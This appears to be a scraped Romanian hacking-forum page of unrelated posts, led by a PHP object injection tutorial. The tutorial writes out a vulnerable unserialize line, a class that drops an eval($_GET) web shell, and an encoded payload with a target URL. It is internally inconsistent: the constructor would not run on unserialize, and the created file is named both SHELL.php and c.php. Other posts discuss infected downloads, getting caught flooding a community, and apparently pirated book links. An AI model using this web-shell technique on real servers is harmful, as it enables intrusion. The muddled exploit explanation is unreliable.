Leaderboard

PHP Object injection Php object injection este o vulnerabilitate de tip RCE care este cauzata de folosirea necorespunzatoare a functiei serialize si unserialize din php.Aceasta functie serielize este folosita deobicei pentru pastrarea unui array intr-un string, spre exemplu daca aveti un array cu ultimele pagini accesate de utilizator si vreti sa le pastrati intr-un cookie ca apoi sa puteti sa folositi cookie-ul pe post de array puteti folosi aceste doua functii. Problema este ca se pote face serielize si pe classe iar atacatorul poate face o clasa prin care poate apela functia _contruct si sa execute cod php. Un exemplu de cod vulnerabil este acesta: <?php $d=unserialize(urldecode($_GET['a'])); ?> Cum vom putea exploata aceasta linie de cod in avantajul nostru ? Simplu vom incerca sa facem serielize la o clasa astfel cand vom introduce stringu serializat in ?a= in $d se v-a crea noua noatra clasa si se v-a executa codul nostru malitios. Rulam urmatorul cod: <?php class inj{ function inj($fil){ file_put_contents($fil,'<?php eval($_GET["a"]); ?>'); } } echo urlencode(serialize(new inj('SHELL.php'))); ?> In urma rularii codului de mai sus veti obtine payloadul: O%3A3%3A%22inj%22%3A0%3A%7B%7D Iar daca intrduceti acel payload in codul vulnerabil : site.com/phpobj.php?a=O%3A3%3A%22inj%22%3A0%3A%7B%7D se v-a crea fisierul c.php pe serverul victimei. Parametri vulnerabili sub care poate aparea vulnerabilitatea pot fi : $_COOKIE $_POST $_SERVER $_GET $_REQUEST Petru a evita aceasta vulnerabitate evitati folosirea acestor functii sau sa le inlocuiti cu json_encode in loc de serialize si json_decode in loc de unserialize O astfel de vulnerabilitate a fost reparata in vbulletin 4.2.2 Security Exploit Patched on vBulletin – PHP Object Injection | Sucuri Blog

Mai adaug eu o conditie. Sa fiti VIP.

Mai taie din ele da-le dracu' Toate fisierele sunt modificate pe 25, luat vreo 3 la mana si a inceput nebunia prin spate. E frumos ce faci ? Ai gasit unde sa infectezi lumea

Salut, Fisierul meu a fost ales ca free file of the month pe codecanyon, daca vreti sa il incercati, puteti sa il descarcati gratuit de aici : JavaScript - jQuery Multiple Tag Select | CodeCanyon Demo : Easy Development | jQuery Multiple Tag Select Daca aveti vreo sugestie sau aveti nevoie de ajutor, please tell

Nu. Da. Au nevoie de un mandat, decat doar daca este declarat prin lege ca cei de la ISP sa predea log-urile complete catre acel "site", oricum pana sa te arda dureaza oleaca, intr-un final daca folosesti aceleasi metode vei fi prins = buleala = futai. Concluzia, de ce sa dai flood unei comunitati de gaming pentru niste cacaturi? lasa oamenii sa-si conduca comunitatea, tu ocupa-te de white hacking... si vei avea de castigat pe viitor... (true story b.)

Dar dc leai postat si palea care nu functioneaza !? Tu vrei sa zici ca te-au mers toate?

The Art of Assembly Language Programming [TABLE=width: 615] [TR] [TD=width: 560, colspan: 6, align: left]The PDF version of "The Art of Assembly Language Programming" is a complete, high-quality version of the text. It is much easier to read and provides an excellent vehicle for printing your own copy of the text. However, to view and print PDF files, you will need a copy of Adobe's Acrobat reader program. You may obtain a free copy of this program for a wide variety of operating systems directly from Adobe.[/TD] [TD=width: 36][/TD] [/TR] [TR] [TD=width: 1][/TD] [TD=width: 16][/TD] [TD=width: 512, colspan: 5, align: left]If you have installed Adobe Acrobat Reader, clicking on the following links should automatically bring up the PDF version of the specified chapter.[/TD] [TD=width: 48][/TD] [TD=width: 36][/TD] [/TR] [TR] [TD=width: 1][/TD] [TD=width: 16][/TD] [TD=width: 16][/TD] [TD=width: 224, colspan: 1, align: left] Short Table of Contents Long Table of Contents Forward Chapter 1 Chapter 2 Chapter 3 Chapter 4 Chapter 5 Chapter 6 Chapter 7 Chapter 8 Chapter 9 Chapter 10 Chapter 11 Chapter 12 Chapter 13 Chapter 14 [/TD] [TD=width: 16][/TD] [TD=width: 256, colspan: 2, align: left] Chapter 15 Chapter 16 Chapter 17 Chapter 18 Chapter 19 Chapter 20 Chapter 21 Chapter 22 Chapter 23 Chapter 24 Chapter 25 Note: Appendix A is non-existant Appendix B Appendix C Appendix D Index [/TD] [/TR] [/TABLE] Sursa: Art of Assembly Language, PDF Files

Imi aduc aminte de aceasta carte. Mai jos sunt inca doua carti. Prima se adreseaza programatorilor incepatori, si are o structura didactica(este pentru platforme x86 Windows) iar cea de a doua, "Professional Assembly Language x86", cuprinde si regstrii de tip streaming mmx/sse si este pentru *NIX-uri. http://kysmykseka.net/kysmyk/Wizardry/Programming/Assembly/Assembly%20Language%20for%20x86%20Processors%206th%20Ed.pdf https://github.com/forhappy/CS61/blob/master/Books/Professional.Assembly.Language.Jan.2005.eBook-DDU.pdf

http://spaceflight.nasa.gov/realdata/sightings/cities/skywatch.cgi?country=Dicu+was+here